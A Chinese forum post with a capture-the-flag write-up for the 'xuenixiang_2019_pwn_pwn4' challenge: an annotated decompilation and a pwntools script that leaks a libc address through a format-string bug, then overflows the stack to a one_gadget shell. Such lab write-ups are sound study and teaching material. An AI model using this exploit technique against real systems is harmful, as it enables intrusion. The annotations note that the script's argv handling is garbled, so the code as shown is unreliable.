kone 发表于 2020-11-13 15:17:41

xuenixiang_2019_pwn_pwn4 wp by kone

思路:
1. 通过格式化字符串漏洞,泄露 __libc_start_main 的地址
2. 根据 __libc_start_main 的地址确定 libc 版本
3. 获取 one_gadget 的地址
4. 利用栈溢出把返回地址改为 one_gadget 的地址


exp:
#-*- coding:utf-8 -*-
"""
// xuenixiang_2019_pwn_pwn4: https://www.xuenixiang.com/ctfexercise-competition-293.html
//
// Decompiler output of the target's main(). Two defects in it are what the
// script below relies on (see the 思路 at the top of the post):
//   * printf(s) -- the user-supplied buffer is used directly as the format
//     string (CWE-134), so a "%N$p" directive reads a stack slot back to the
//     client. The fix is printf("%s", s) or simply puts(s).
//   * read(0, s, 0x40) -- 64 bytes are read into a fixed-size stack buffer
//     (CWE-121). The decompiler does not show the real size of s; the
//     payload below pads to 0x28 before the return address, so s plus the
//     saved frame pointer presumably occupy 40 bytes -- confirm in the
//     disassembly. The fix is to bound the read by sizeof(s) - 1, and to
//     build with the stack protector enabled.
// The Chinese strings are the prompts the script synchronises on, so they
// are kept verbatim; English glosses are given in parentheses.

int __cdecl main(int argc, const char **argv, const char **envp)
{
char s; // BYREF  -- shown as one char by the decompiler; see the note above

setvbuf(_bss_start, 0LL, 2, 0LL);   // stdout unbuffered (_IONBF == 2)
setvbuf(stdin, 0LL, 1, 0LL);        // stdin line-buffered (_IOLBF == 1)
memset(s, 0, sizeof(s));
puts(&::s);               // 人类的本质是什么? ("What is the essence of humanity?")
read(0, s, 8uLL);         // first input: at most 8 bytes
printf(s);                // <-- format-string sink: s is attacker-controlled
puts(s);
puts(s);
puts(s);
puts(&byte_400978);       // 一位群友打烂了复读机! ("A group member smashed the repeater!")
sleep(1u);
puts(asc_400998);         // 人类还有什么本质? ("What other essence does humanity have?")
read(0, s, 0x40uLL);      // <-- stack overflow: up to 0x40 bytes into s
if ( !strstr(s, &needle) || !strstr(s, &byte_4009BA) )   // both substrings must be present
{
    puts(&byte_4009C8);   // 你并没有理解人类的本质,再见! ("You have not understood the essence of humanity, goodbye!")
    exit(0);
}
puts(&byte_4009F8);      
return 0;                 // the return is what consumes the overwritten return address
}

"""

from pwn import *
from LibcSearcher import *

import sys

# pwntools: echo every byte sent and received. Useful when one of the prompt
# strings below does not match and the script hangs in recvuntil().
context(log_level="debug")

# Target selection.
# NOTE(review): `process(sys.argv)` / `remote(sys.argv, sys.argv)` pass the
# whole argv list. The usage line shows the intent is `sys.argv[1]` for a
# local binary and `sys.argv[1], int(sys.argv[2])` for host/port; the index
# brackets were presumably eaten by the forum's markup -- confirm against the
# original exp.py before running.
if len(sys.argv) == 2:
        p = process(sys.argv)
elif len(sys.argv) == 3:
        p = remote(sys.argv, sys.argv)
else:
    print("Usage: exp.py [./a.out | 1.1.1.1 23456]")
    exit(1)

# Step 1 (see the 思路 above): the binary calls printf(s) on our input, so a
# positional "%N$p" directive prints one stack slot. Which slot (11 here)
# holds the wanted libc address is target-specific and was presumably found
# by trying several values.
payload1 = "%11$p"
p.sendlineafter("人类的本质是什么?\n", payload1)

# Skip one line of the echoed output before reading the leak; which line
# that is depends on what printf/puts emit first -- verify in the debug log.
p.recvline()

# "0x" + 12 hex digits = 14 characters, i.e. a 48-bit user-space address.
# The leaked value is treated as __libc_start_main+231 (presumably the
# return address into __libc_start_main after main returns). The 231 is
# specific to the libc build named below; confirm it for any other target.
libc_start_main_addr = int(p.recv(14), 16) - 231

print(hex(libc_start_main_addr))

# Step 2: LibcSearcher matches candidate libc builds by the symbol's page
# offset (low 12 bits). If several builds match, add_condition() narrows the
# set; the commented-out call is a leftover from that step.
libc = LibcSearcher("__libc_start_main", libc_start_main_addr)
# libc.add_condition('system', 0x03bc00)
libc_base = libc_start_main_addr - libc.dump("__libc_start_main")

# Printed in decimal; hex() would be easier to compare against the leak.
print(libc_base)

# Wait for the second prompt (the binary sleeps 1 s before printing it).
p.recvuntil("人类还有什么本质?\n")

# Step 3: one_gadget offsets for the identified libc build. Each gadget has
# register/stack constraints at the moment it is reached; 0x4f322 is the one
# used here, the other two are listed as the alternatives found.
# libc6_2.27-3ubuntu1_amd64
# 0x4f2c5, 0x4f322, 0x10a38c
one_gadget = 0x4f322
one_addr = libc_base + one_gadget

# Step 4: the second read(0, s, 0x40) accepts up to 64 bytes into the same
# buffer. The input must pass the two strstr() checks in main, which is what
# the prefix is for (presumably it contains both needles -- confirm against
# the binary's strings). The prefix is 12 bytes in UTF-8; ljust pads it to
# 0x28 = 40 bytes (buffer plus saved rbp, presumably -- this also assumes no
# stack canary, confirm with checksec) and the following 8 bytes overwrite
# the saved return address. Total 48 bytes, within the 0x40 limit.
# NOTE: str + p64() concatenation only works on Python 2 (the coding header
# above matches); on Python 3 `prefix` would have to be bytes.
prefix = "鸽子真香"
payload2 = prefix.ljust(0x28, 'A') + p64(one_addr)

p.send(payload2)
p.interactive()


admin 发表于 2020-11-13 17:44:39

不错